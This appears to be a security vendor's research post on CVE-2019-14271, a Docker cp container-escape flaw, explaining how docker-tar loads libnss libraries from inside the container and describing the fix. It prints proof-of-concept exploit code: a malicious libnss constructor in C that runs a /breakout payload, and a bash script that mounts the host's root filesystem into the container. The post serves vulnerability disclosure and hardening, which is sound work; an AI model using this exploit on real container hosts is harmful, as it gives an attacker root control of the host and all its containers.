
Executive Summary

In the last few years, several vulnerabilities in the copy (cp) command were found in various container platforms, including Docker, Podman and Kubernetes. The most severe of these was discovered and disclosed only recently, in July. Surprisingly, it gained almost no immediate attention, perhaps due to an ambiguous CVE description and the lack of a published exploit.

CVE-2019-14271 marks a security issue in the implementation of the Docker cp command that can lead to full container escape when exploited by an attacker. This is the first complete container breakout since the severe runC vulnerability discovered back in February.

The vulnerability can be exploited, provided that a container has been compromised by a previous attack (e.g. through any other vulnerability, leaked secrets, etc.), or when a user runs a malicious container image from an untrusted source (registry or other). If the user then executes the vulnerable cp command to copy files out of the compromised container, the attacker can escape and take full root control of the host and all other containers in it.

CVE-2019-14271 was marked as critical and fixed in Docker version 19.03.1. The following research is an overview of CVE-2019-14271 and the first Proof of Concept (PoC) of the vulnerability.

Ariel Zelivansky and I have been closely following the recent surge of copy vulnerabilities in major container platforms, and we’ll present our findings at KubeCon + CloudNativeCon 2019 in San Diego on November 20. We’ll dive into past vulnerabilities, the different implementations and some of the underlying reasons that make this relatively simple command surprisingly hard to implement. We’ll also discuss some cool new kernel features specifically written to tackle this problem. If you’re interested in container security, please come and check it out!

Docker cp

The copy command allows copying files from and to containers, as well as between containers. The syntax is quite similar to the standard Unix cp command. To copy out /var/logs from a container, the syntax is docker cp container_name:/var/logs /some/host/path.

As you can see in the image below, to copy files out of the container, Docker uses a helper process called docker-tar.

Figure 1. Copying files out of a container

docker-tar works by chrooting into the container (as you can see in the next image), archiving the requested files and directories in it and then passing back the resulting tar file to the Docker daemon which is responsible for extracting it to the target directory on the host.

Figure 2. docker-tar chroots into the container

Chrooting is mostly done to avoid symlink issues, which can occur when a host process tries to access files in a container. If one of those files is a symlink, it might inadvertently be resolved under the host root. This opens the door for attacker-controlled containers to try to trick docker cp into reading and writing files on the host instead of the container. Several CVEs in Docker and Podman were assigned for symlink-related issues in the last year. By chrooting into the container’s root, docker-tar ensures all symlinks are resolved under it.
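The symlink problem can be reproduced without any container at all. The following is a minimal sketch in C, not Docker's code: the helper name resolves_outside_root and the temporary directory that stands in for a container root are assumptions made for illustration. It resolves a path the way a host process would and reports whether the result lands outside the supposed container root.

```c
#define _XOPEN_SOURCE 700
#include <assert.h>
#include <limits.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical helper: returns true when `path`, resolved by a host
 * process, lands outside `container_root`. */
bool resolves_outside_root(const char *container_root, const char *path)
{
    char root[PATH_MAX];
    char target[PATH_MAX];

    /* realpath() follows every symlink, as a naive host-side copy would. */
    if (realpath(container_root, root) == NULL || realpath(path, target) == NULL)
        return false; /* unresolvable paths are not classified in this sketch */

    size_t n = strlen(root);
    if (n == 1)
        return false; /* root is "/": nothing can be outside it */

    /* Inside only if the prefix matches on a path-component boundary. */
    bool inside = strncmp(target, root, n) == 0 &&
                  (target[n] == '/' || target[n] == '\0');
    return !inside;
}

#ifdef DEMO_MAIN
int main(void)
{
    char tmpl[] = "/tmp/cp_demo_XXXXXX";
    char link_path[PATH_MAX];
    char *root = mkdtemp(tmpl);                 /* stand-in for a container root */
    if (root == NULL)
        return 1;
    snprintf(link_path, sizeof link_path, "%s/logs", root);
    if (symlink("/", link_path) != 0)           /* container-controlled symlink */
        return 1;
    printf("escapes root: %d\n", resolves_outside_root(root, link_path));
    unlink(link_path);
    rmdir(root);
    return 0;
}
#endif
```

Compiling with -DDEMO_MAIN builds the small demo. A process that has chrooted into the container root would resolve the same symlink relative to that root, which is the property docker-tar relies on.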

Unfortunately, chrooting into the container opened the way for an even more severe issue when copying files from a container.

CVE-2019-14271

Docker is written in Golang. Specifically, the vulnerable Docker version was compiled with Go v1.11. In this version, some packages that contain embedded C code (cgo) dynamically load shared libraries at runtime. These packages include net and os/user, both used by docker-tar, which load several libnss_*.so libraries at runtime. Normally, the libraries would be loaded from the host filesystem, but since docker-tar chroots into the container, it loads them from the container filesystem. That means docker-tar will load and execute code originating from and controlled by the container.

To clarify, aside from being chrooted to the container filesystem, docker-tar isn’t containerized. It runs in the host namespaces, with all root capabilities and not limited by cgroups or seccomp. Therefore, by injecting code into docker-tar, a malicious container gains full root access to the host.

The possible attack scenario is a Docker user that copies some files from either:

A container running a malicious image with bad libnss_*.so libraries.

A compromised container where an attacker replaced the libnss_*.so libraries.

In both cases, the attacker gains root code execution on the host.

Fun fact: This vulnerability was actually discovered from a GitHub issue. A user tried to copy files out of a debian:buster-slim container and complained docker cp repeatedly failed. The problem was that this specific image doesn’t contain the libnss libraries. Thus, when the user ran docker cp and the docker-tar process tried to load them from the container filesystem, it failed and crashed.

Exploitation

To exploit CVE-2019-14271, we need to build a malicious libnss library. I arbitrarily chose libnss_files.so. I downloaded the library’s source and added one function, run_at_link(), to one of the source files. I also defined the function with the constructor attribute. The constructor attribute (a GCC-specific extension) indicates that the run_at_link function is to be executed as an initialization function for our library when it is loaded by a process. This means that when the docker-tar process dynamically loads our malicious library, run_at_link will be executed. Below is the run_at_link code, shortened for brevity.

    #include ...

    #define ORIGINAL_LIBNSS "/original_libnss_files.so.2"
    #define LIBNSS_PATH "/lib/x86_64-linux-gnu/libnss_files.so.2"

    bool is_priviliged();

    __attribute__ ((constructor)) void run_at_link(void)
    {
        char * argv_break[2];

        if (!is_priviliged())
            return;

        rename(ORIGINAL_LIBNSS, LIBNSS_PATH);
        fprintf(log_fp, "switched back to the original libnss_file.so");

        if (!fork())
        {
            // Child runs breakout
            argv_break[0] = strdup("/breakout");
            argv_break[1] = NULL;
            execve("/breakout", argv_break, NULL);
        }
        else
            wait(NULL); // Wait for child

        return;
    }

    bool is_priviliged()
    {
        FILE * proc_file = fopen("/proc/self/exe", "r");
        if (proc_file != NULL)
        {
            fclose(proc_file);
            return false; // can open so /proc exists, not privileged
        }
        return true; // we're running in the context of docker-tar
    }
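The constructor attribute can be seen in isolation in the following minimal sketch. It is not part of the exploit: the names run_at_load, constructor_ran and constructor_has_run are made up for this illustration. The function marked as a constructor is never called explicitly, yet it has already run by the time any other code executes.

```c
#include <assert.h>
#include <stdio.h>

/* Hypothetical flag used only for this demonstration. */
static int constructor_ran = 0;

/* GCC and Clang run functions marked with the constructor attribute
 * before main(), or, for a shared library, when the library is loaded. */
__attribute__((constructor))
static void run_at_load(void)
{
    constructor_ran = 1;
}

/* Reports whether the constructor has already executed. */
int constructor_has_run(void)
{
    return constructor_ran;
}

#ifdef DEMO_MAIN
int main(void)
{
    /* run_at_load() is never called here, yet the flag is already set. */
    printf("constructor ran before main: %d\n", constructor_has_run());
    return 0;
}
#endif
```

Compiling with -DDEMO_MAIN builds a standalone demo. In a shared library, the same mechanism fires when the library is loaded, which is what lets a replaced libnss library run code inside whichever process loads it.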

run_at_link first verifies it runs in the context of docker-tar, since other, normal container processes might also load it. This is done by checking the /proc directory. If run_at_link runs in the context of docker-tar, this directory will be empty, since the procfs mount on /proc only exists in the container mount namespace.
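The check described above boils down to "can a file under /proc be opened?". Below is a small sketch of that idea with the probe path passed in as a parameter so it can be tried safely outside a container. The function name procfs_missing and the parameter are assumptions for illustration, not the exploit's code.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdio.h>

/* Hypothetical helper: returns true when the probe file cannot be opened.
 * With "/proc/self/exe" as the probe, a true result suggests that no
 * procfs is mounted at /proc in the current root. */
bool procfs_missing(const char *probe_path)
{
    FILE *fp = fopen(probe_path, "r");
    if (fp != NULL) {
        fclose(fp);
        return false; /* probe opened: procfs (or the file) is present */
    }
    return true;      /* probe failed: nothing usable at that path */
}

#ifdef DEMO_MAIN
int main(void)
{
    printf("procfs missing: %d\n", procfs_missing("/proc/self/exe"));
    return 0;
}
#endif
```

Note that a failed open is only a heuristic: it cannot distinguish an unmounted /proc from any other reason the open might fail.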

Next, run_at_link replaces the evil libnss library with the original one. This ensures that any subsequent processes run by the exploit won’t accidentally load the malicious version and retrigger the execution of run_at_link.

Then, to simplify the exploit, run_at_link attempts to run an executable file at path /breakout in the container. This allows the rest of the exploit to be written in bash for example, instead of C. Leaving the rest of the logic out of run_at_link also means we don’t have to recompile the evil library for every change in the exploit, but rather just change the breakout binary.

In the exploit video below, a Docker user runs a malicious image that contains our evil libnss_files.so library and then tries to copy some logs from the container. The /breakout binary in the image is a simple bash script that mounts the host filesystem to the container at /host_fs and also writes a message to /evil on the host.

Video 1. Exploiting CVE-2019-14271 to break out of Docker

Below is the source for the /breakout script used in the video. To get a reference to the host root filesystem, the script mounts procfs over /proc. Since docker-tar runs in the PID namespace of the host, the mounted procfs will contain data on host processes. The script then simply mounts the root of the host’s PID 1.

    #!/bin/bash

    umount /host_fs && rm -rf /host_fs
    mkdir /host_fs

    mount -t proc none /proc     # mount the host's procfs over /proc
    cd /proc/1/root              # chdir to host's root
    mount --bind . /host_fs      # mount host root at /host_fs

    echo "Hello from within the container!" > /host_fs/evil

The Fix

The fix included patching the init function of docker-tar to call arbitrary functions from the problematic Go packages. This forced docker-tar to load the libnss libraries before chrooting to the container, and thus from the host filesystem.

Figure 3. CVE-2019-14271 fix
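Docker's patch is written in Go and is not reproduced here. The idea behind it, forcing the lookup libraries to load while the process still sees the host filesystem, can be sketched in C under the assumption of a glibc system that loads its NSS backends lazily on first use. The helper name warm_up_nss is hypothetical, and the lookup targets "root" and "localhost" are arbitrary choices.

```c
#define _XOPEN_SOURCE 700
#include <assert.h>
#include <netdb.h>
#include <pwd.h>
#include <stddef.h>
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>

/* Hypothetical helper: performs one user lookup and one host lookup so the
 * C library resolves its NSS backends now, before any chroot. The results
 * are deliberately ignored; only the side effect of loading matters.
 * Returns the number of lookups issued. */
int warm_up_nss(void)
{
    int issued = 0;
    struct addrinfo *res = NULL;

    (void)getpwnam("root");                               /* user database lookup */
    issued++;

    if (getaddrinfo("localhost", NULL, NULL, &res) == 0)  /* host lookup */
        freeaddrinfo(res);
    issued++;

    return issued;
}

#ifdef DEMO_MAIN
int main(void)
{
    printf("lookups issued before chroot: %d\n", warm_up_nss());
    /* A real helper would call chroot() only after this point. */
    return 0;
}
#endif
```

The ordering is the whole point: the lookups happen first and the chroot second, so whatever gets loaded comes from the host rather than from files the container controls.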

Conclusion

A vulnerability allowing root code execution on the host is highly dangerous. Make sure you’re running Docker version 19.03.1 or newer, which includes the fix for this security issue. To limit the attack surface for this kind of attack, I strongly suggest never running untrusted images.

Furthermore, when root is not strictly needed, I highly recommend running containers as a non-root user. This further increases their security and prevents attackers from exploiting many of the flaws that may be found in container engines or the kernel. In the case of CVE-2019-14271, if your container runs as a non-root user, you are protected. Even if an attacker compromises your container, they cannot overwrite the container’s libnss libraries, as these are owned by root, and therefore cannot exploit the vulnerability. If you’re still not convinced, this post by Ariel Zelivansky covers the security advantages of running non-root containers and might change your mind.

Palo Alto Networks customers running Prisma Cloud are further protected from this threat through the following set of capabilities: